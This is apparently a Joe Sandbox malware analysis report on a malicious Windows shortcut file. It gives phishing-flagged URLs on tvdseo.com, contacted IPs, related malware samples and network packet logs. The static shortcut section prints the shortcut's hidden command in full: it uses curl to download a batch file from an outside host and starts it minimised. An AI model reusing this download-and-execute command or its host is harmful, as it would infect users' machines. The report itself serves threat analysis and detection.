              https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/dich-vu-seo-youtube/UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?verUDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/category/tin-hoc-ab/UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/dich-vu-seo-shop-tmdt/UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/file/quan.batecurl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.pngUDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?veUDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.pngUDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slntUDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/xmlrpc.phpUDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://images.dmca.com/badges/dmca.css?ID=502286c4-db26-4ff5-898e-3899d9fd8507UDkXtQleTB.bat.2.drfalse
                		high
                https://www.dmca.com/Protection/Status.aspx?id=502286c4-db26-4ff5-898e-3899d9fd8507&amp;refurl=httpsUDkXtQleTB.bat.2.drfalse
                  		high
                  https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)UDkXtQleTB.bat.2.drfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)UDkXtQleTB.bat.2.drfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.jsUDkXtQleTB.bat.2.drfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0UDkXtQleTB.bat.2.drfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4eUDkXtQleTB.bat.2.drfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-searUDkXtQleTB.bat.2.drfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://tvdseo.com/xmlrpc.php?rsdUDkXtQleTB.bat.2.drfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://yoast.com/wordpress/plugins/seo/UDkXtQleTB.bat.2.drfalse
                    		high
                    https://tvdseo.com/iq-vo-cuc/UDkXtQleTB.bat.2.drfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.UDkXtQleTB.bat.2.drfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2UDkXtQleTB.bat.2.drfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.pngUDkXtQleTB.bat.2.drfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.pngUDkXtQleTB.bat.2.drfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://gmpg.org/xfn/11UDkXtQleTB.bat.2.drfalse
                      		high
                      https://congdonginan.vn/UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/#websiteUDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/dich-vu-seo-instagram/UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/dich-vu-seo-facebook/UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.pngUDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/category/thongtinhay/UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/dich-vu-seo-fanpage/UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/my-account-2/curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1UDkXtQleTB.bat.2.drfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://www.google.com/maps/embed?pb=UDkXtQleTB.bat.2.drfalse
                        		high
                        https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7UDkXtQleTB.bat.2.drfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        https://tvdseo.com/dich-vu-seo-google-map/UDkXtQleTB.bat.2.drfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        https://api.w.org/UDkXtQleTB.bat.2.drfalse
                          		high
                          https://tvdseo.com/#/schema/logo/image/UDkXtQleTB.bat.2.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://tvdseo.com/dich-vu-seo-shop-shoppe/UDkXtQleTB.bat.2.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.UDkXtQleTB.bat.2.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStgUDkXtQleTB.bat.2.drfalse
                            		high
                            https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttfUDkXtQleTB.bat.2.drfalse
                            • Avira URL Cloud: phishing
                            		unknown
                            https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0UDkXtQleTB.bat.2.drfalse
                            • Avira URL Cloud: phishing
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.81.137
                            		tvdseo.comUnited States
                            		13335CLOUDFLARENETUSfalse

                            Private

                            IP
                            127.0.0.1

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1562561
                            Start date and time:2024-11-25 18:00:28 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 58s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:document.lnk.download.lnk
                            Detection:MAL
                            Classification:mal72.winLNK@7/1@1/2
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .lnk

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: document.lnk.download.lnk

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.21.81.137Compilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
                              ZkHGQqVNJE.binGet hashmaliciousUnknownBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                tvdseo.comCompilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
                                • 104.21.81.137
                                http://tvdseo.comGet hashmaliciousUnknownBrowse
                                • 86.38.202.97

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUShttp://www.urbanerecycling.comGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                • 104.17.25.14
                                https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3DGet hashmaliciousUnknownBrowse
                                • 104.21.55.245
                                Encrypt DOC2024.11.19.1983928 shared with you! (203 KB).msgGet hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                AccountDocuments - christinal.docxGet hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2Get hashmaliciousHTMLPhisherBrowse
                                • 1.1.1.1
                                Compilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
                                • 104.21.81.137
                                file.exeGet hashmaliciousUnknownBrowse
                                • 172.67.187.240
                                https://protection.cloze.email/r/EKJc7NAc1aGPd0140vt6MnJzYkpI4pQCyldpUEBtdFT8T8dhNmmHodcXxvKddJW4AhfqaDIQj32BX0HxSGbmPeDqDQs/n/SlBNQ05FV1NMRVRURVI/y52l9ppb.r.ap-northeast-1.awstrack.me/L0/https:%2F%2Fcloudprotectionc5f91e84a2b3d9e748f2a1d9b7e5f0c4a2b3d9e7a5pages.dynamixs.workers.dev%2F/1/010601933048cf65-492c630f-d6b3-471e-a31f-bf186231f1e8-000000/SL9CcqykWh2mQIC7eGiOMwzMSpk=185Get hashmaliciousUnknownBrowse
                                • 104.21.29.43
                                http://ti-17-0.914trk.comGet hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                https://www.google.com/url?q=https://clickme.thryv.com/ls/click?upn%3Du001.3HlspJ5fg-2BP4CQkV7GSVhvWTpgC6w0k7sA8b2Z9JBYU9BEMXtqHWLHW9PPcpforJszQ3_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQiOVUz527Ewi1t813S-2FHejAJLe09fD2VqgM8mtwuQZA9i83VLkCPF4iItCSPXKUpNgWQKWxjEO6jlBp5GYVLghrpKcDuea5GONmLMVlbh4fQe7dtjhTFxxxExxfN1kv5tnx1PPl9DjYIyE468wz1qa1Z-2FWJgZrJbIFEpqhd4o5tGGyUoiPcIot5l2j9dpjy7QKj99ZiCz-2BBLi5dHUIl8gC4RxZBl-2FMaH4IZlQyWpqM-2BtZ9uE3ezFUl2fORMwAp4lQk-3D%23Cjanetrosenbach@imageindustries.com&source=gmail-imap&ust=1733149343000000&usg=AOvVaw1uIAp-JnZbTlkY9Td9ZLJjGet hashmaliciousHTMLPhisherBrowse
                                • 172.67.166.17

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                74954a0c86284d0d6e1c4efefe92b521ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                • 104.21.81.137
                                18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                • 104.21.81.137
                                KEFttAEb.vbsGet hashmaliciousPureCrypterBrowse
                                • 104.21.81.137
                                hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                • 104.21.81.137
                                hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                • 104.21.81.137
                                reservation .exeGet hashmaliciousTVratBrowse
                                • 104.21.81.137
                                oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                • 104.21.81.137
                                aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                • 104.21.81.137
                                wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                • 104.21.81.137
                                PkWnPA8l7C.exeGet hashmaliciousDBatLoader, TVratBrowse
                                • 104.21.81.137

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\Public\UDkXtQleTB.bat

                                Download File
                                Process:C:\Windows\SysWOW64\curl.exe
                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4512), with CRLF, LF line terminators
                                Category:dropped
                                Size (bytes):104100
                                Entropy (8bit):5.6234075761484945
                                Encrypted:false
                                SSDEEP:3072:rO8dklCv0QCInTQDdoOkbd5t7UNlwtQeX1C+FSgqGRdPUVtSS0:pCW0QdTK+S0
                                MD5:CF1E01C2482E0F6C4097B3EF9B733A94
                                SHA1:9D40A38FA06C7EA27E42CC00698E4ADD387FAAE0
                                SHA-256:C63B7D6EF4D4561CD8CCC97A014A69C905FDECFF67DBB4E5CE1BB0F55B1EE8B7
                                SHA-512:85233DFE03EA259C17D5CCB90A02BD856DB5380341AD5E9063FFCF05A00D83063687B35CA44399DCD57298673CFA03B0541D336A6D809CCD639534797DF3199D
                                Malicious:true
                                Reputation:low
                                Preview:<!DOCTYPE html>.<html lang="vi" class="loading-site no-js">.<head>..<meta charset="UTF-8" />..<link rel="profile" href="https://gmpg.org/xfn/11" />..<link rel="pingback" href="https://tvdseo.com/xmlrpc.php" />...<script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script>.<meta name='robots' content='noindex, follow' />.<meta name="viewport" content="width=device-width, initial-scale=1" /> Ch. .. ..ng . Google tag (gtag.js) dataLayer ...c th.m b.i Site Kit -->.<script id='google_gtagjs-js-consent-mode-data-layer'>.window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}.gtag('consent', 'default', {"ad_personalization":"denied","ad_storage":"denied","ad_user_data":"denied","analytics_storage":"denied","functionality_storage":"denied","security_storage":"denied","personalization_storage":"denied","region":["AT","BE","BG","CH","CY","CZ","DE","DK","EE","ES","FI","FR","GB","GR","HR","

                                Static File Info

                                General

                                File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Sun Nov 19 08:21:59 2023, mtime=Tue Oct 1 09:54:59 2024, atime=Sun Nov 19 08:21:59 2023, length=236544, window=hidenormalshowminimized
                                Entropy (8bit):3.55363835241176
                                TrID:
                                • Windows Shortcut (20020/1) 100.00%
                                File name:document.lnk.download.lnk
                                File size:2'037 bytes
                                MD5:504d8898a97dda2963425df8c5a04118
                                SHA1:0554cf0e2137e4a925e9137b9330491361c77011
                                SHA256:7a1d5aa394c347ff8606fa04a44cc507fab103c8167e52310ec683dbb005b4fd
                                SHA512:94698a9adbcdca70ad7b51d7446dd34b5c2256addae266ddae4d1dfccbf86ba5d4268213441820b7b56a7cf92db20430761a8892af620640522f84c0628d1bfe
                                SSDEEP:24:8WSJfdJzitaIGO2uz+seAS7jFyVgS7VddNXuHYocLbAXTp4P65mf:8WIbgQOFeNFcrdLXuHULkX14mE
                                TLSH:1F4132160BE91B15F3F71C7868F71350863B7A0BEE109B0D019502484813A21DE68F7B
                                File Content Preview:L..................F.@.. .....4.....n..\.....$6.............................5....P.O. .:i.....+00.../C:\...................V.1.....6YZY..Windows.@........V..AYDm..............................W.i.n.d.o.w.s.....Z.1......X.|..SysWOW64..B........V..AYDm......

                                File Icon

                                Icon Hash:74f4f4dcece9e9ed

                                Static Windows Shortcut Info

                                General

                                Relative Path:..\..\..\Windows\SysWOW64\cmd.exe
                                Command Line Argument:/c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
                                Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2024 18:01:24.723707914 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:24.723747969 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:24.723814964 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:24.750706911 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:24.750720978 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.087337971 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.087434053 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.093796968 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.093806028 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.094206095 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.100426912 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.143376112 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.957967997 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.958012104 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.958039045 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.958060980 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.958091974 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.958122015 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.958151102 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.958151102 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.958163023 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.958203077 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.966497898 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.966553926 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.966562033 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.982729912 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:26.982786894 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:26.982794046 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.032006979 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.079507113 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.125925064 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.125936985 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.171958923 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.172008038 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.172017097 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.181492090 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.181546926 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.181551933 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.189717054 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.189778090 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.189789057 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.197734118 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.197784901 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.197791100 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.205950975 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.206000090 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.206006050 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.214006901 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.214051008 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.214056015 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.222382069 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.222446918 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.222451925 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.228838921 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.228885889 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.228892088 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.235788107 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.235816002 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.235836029 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.235842943 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.235881090 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.242336988 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.249017954 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.249068975 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.249075890 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.297656059 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.297663927 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.344688892 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.378290892 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.380759954 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.380810022 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.380819082 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.387625933 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.387670040 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.387676001 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.397861958 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.397870064 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.397921085 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.397927046 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.407299042 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.407366037 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.407371998 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.407416105 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.417125940 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.417145014 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.417179108 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.421861887 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.421917915 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.421924114 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.421971083 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.426517010 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.431642056 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.431710958 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.431724072 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.431766987 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.441090107 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.441181898 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.450699091 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.450901985 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.460351944 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.460416079 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.460447073 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.460500956 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.590754986 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.590828896 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.597778082 CET44349703104.21.81.137192.168.2.7
